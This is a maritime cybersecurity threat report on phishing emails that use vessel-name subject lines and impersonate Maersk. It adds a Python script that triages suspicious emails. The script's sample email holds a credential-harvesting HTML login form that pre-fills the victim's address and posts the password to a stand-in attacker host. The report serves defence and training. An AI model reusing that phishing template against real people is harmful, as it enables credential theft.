Maritime security intelligence firm Dryad Global and its cyber partner Red Sky Alliance monitor attempted cyber attacks in the maritime sector, examining how email is used to deceive recipients and potentially expose target organizations. The following update covers the period from 23 to 31 May.
The partners note that even if only 10% of recipients open a malicious attachment, an attacker who sends thousands of templated emails a day still lands hundreds of victims, and much of that process can be automated. Training all employees to recognise malicious emails and attachments is therefore critical.
Subject lines built around a vessel name prefixed with Motor Vessel (MV) or Motor Tanker (MT) are a common lure to entice users in the maritime industry to open emails carrying malicious attachments.
23-31 May: Key points
This week, the companies observed a wide variety of maritime-related subject lines, with names including “MV Tanbinh” and “MV Crown Garnet” among others.
In addition, threat actors impersonated Maersk in at least two malicious emails this week. The first used Maersk as the display name, but the sending address behind it was dvpnvp[at]dvpn[.]gov[.]by, which belongs to the Department of Veterinary and Food Control of the Republic of Belarus.
Threat actors often impersonate official government agencies to make their malicious emails appear more legitimate.
Attached to the email was an HTML file titled “Maersk Shipping Document.html,” which antivirus engines detect as JS/Phish.AB38!tr. Opening the attachment presents a Maersk login screen with the target's email address already filled into the username field.
Users should be wary of any login page that arrives as an attachment or already has their address filled in: the pre-filled field shows the page was prepared for that recipient, and a genuine Maersk login would be reached through the browser, not opened from an email.
Even if the user enters an incorrect password and clicks “Continue,” they are taken to a page warning that the connection is insecure. Clicking “Continue” again leads to hxxps://ptmadras[.]com/oso.php, which currently returns a 404 error. A login form that accepts any password is itself a tell, since the page has no way to check the credential and exists only to capture it; analysts are confident the threat actors are attempting to steal the password entered by the target.
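The Maersk lure described above lends itself to static triage before anyone clicks. The following Python script is an added example, not tooling from Dryad Global, Red Sky Alliance or Safety4Sea: it parses a constructed email (stand-in addresses and domains, not the ones named in the report) and flags the three tells the analysts describe: a vessel-name subject line, a display name that claims a brand the sender domain does not belong to, and an attached HTML login form that pre-fills the recipient's address and posts to a host outside that brand. The vessel-keyword regex and the brand-to-domain map are assumptions a team would maintain themselves.

```python
"""Static triage of a suspected maritime phishing email (added example, not the
report's own tooling). Standard library only."""
import re
from email import message_from_string, policy
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumptions, not from the report: the lure pattern and brand -> legitimate domains.
VESSEL_LURE = re.compile(r"\b(?:MV|MT|M/V|M/T)\s+[A-Z][\w-]+", re.I)
BRAND_DOMAINS = {"maersk": {"maersk.com"}}
KNOWN_DOMAINS = {d for ds in BRAND_DOMAINS.values() for d in ds}

# Constructed sample; addresses and domains are stand-ins for the ones in the report.
SAMPLE_EML = """\
From: Maersk <sender@dvpn.example>
To: ops@shipper.example
Subject: MV Tanbinh shipping documents
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

Please find attached the shipping document.
--b1
Content-Type: text/html; name="Maersk Shipping Document.html"
Content-Disposition: attachment; filename="Maersk Shipping Document.html"

<html><body>
<form method="post" action="https://attacker.example/oso.php">
<input type="email" name="username" value="ops@shipper.example">
<input type="password" name="password">
<button type="submit">Continue</button>
</form></body></html>
--b1--
"""


def defang(text: str) -> str:
    """Render an indicator safely for a report: https://a.b -> hxxps://a[.]b"""
    return text.replace("http", "hxxp").replace(".", "[.]").replace("@", "[at]")


class FormScanner(HTMLParser):
    """Collect form action URLs and pre-filled text/email inputs from HTML."""

    def __init__(self):
        super().__init__()
        self.actions, self.prefilled = [], []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and a.get("action"):
            self.actions.append(a["action"])
        elif tag == "input" and a.get("value") and (a.get("type") or "text").lower() in ("text", "email"):
            self.prefilled.append((a.get("name", ""), a["value"]))


def triage(raw_eml: str) -> dict:
    """Return {'findings': [...], 'iocs': [...]} for one RFC 822 message."""
    msg = message_from_string(raw_eml, policy=policy.default)
    subject = str(msg["Subject"] or "")
    display, sender = parseaddr(str(msg["From"] or ""))
    _, recipient = parseaddr(str(msg["To"] or ""))
    sender_domain = sender.rsplit("@", 1)[-1].lower()
    findings, iocs = [], set()

    if VESSEL_LURE.search(subject):
        findings.append(f"subject uses a vessel-name lure: {subject!r}")

    # Display-name impersonation: "Maersk <someone@unrelated.tld>"
    for brand, domains in BRAND_DOMAINS.items():
        if brand in display.lower() and sender_domain not in domains:
            findings.append(f"display name claims {brand} but sender domain is {defang(sender_domain)}")

    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        if part.get_content_type() != "text/html" and not name.lower().endswith((".html", ".htm")):
            continue
        html = part.get_content()
        if isinstance(html, bytes):
            html = html.decode("utf-8", "replace")
        scanner = FormScanner()
        scanner.feed(html)
        for action in scanner.actions:
            host = (urlparse(action).hostname or "").lower()
            if not any(host == d or host.endswith("." + d) for d in KNOWN_DOMAINS):
                findings.append(f"attachment {name!r} submits its form to {defang(action)}")
            iocs.add(action)
        for field, value in scanner.prefilled:
            if recipient and value.strip().lower() == recipient.lower():
                findings.append(f"attachment {name!r} pre-fills {field!r} with the recipient's address")

    return {"findings": findings, "iocs": sorted(defang(u) for u in iocs)}


if __name__ == "__main__":
    for line in triage(SAMPLE_EML)["findings"]:
        print("-", line)
```

The form-action check is the one that matters most: a login page delivered as an attachment has no legitimate reason to post credentials anywhere, so any action URL outside the claimed brand's domains is treated as an exfiltration endpoint and reported defanged, ready to be added to a block list. Brand detection is by display name only here; a production version would also compare the envelope sender and Reply-To against the same map.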
“These analytical results illustrate how a recipient could be fooled into opening an infected email. They also demonstrate how common it is for attackers to specifically target pieces of a company’s supply chain to build up to cyber-attacks on the larger companies,” Dryad Global said.
Recommendations
The more convincing an email appears, the greater the chance employees will fall for it. Software-based protection should therefore be treated as one part of a wider strategy that also covers the human element and organizational workflows and procedures. To that end, it is imperative to:
- Train all levels of the marine supply chain to recognise that they are under constant cyber-attack.
- Stress the real-world consequences of careless cyber practices or general inattentiveness, and the need for constant attention.
- Provide practical guidance on how to spot a potential phishing attempt.
- Verify emails, including supply chain email communication, through a direct channel such as a known phone number or a previously used address, not the contact details given in the suspicious email itself.
- Use Red Sky Alliance RedXray proactive support and its vessel impersonation information, and use the Maritime Black Lists to proactively block cyber attacks from identified malicious actors.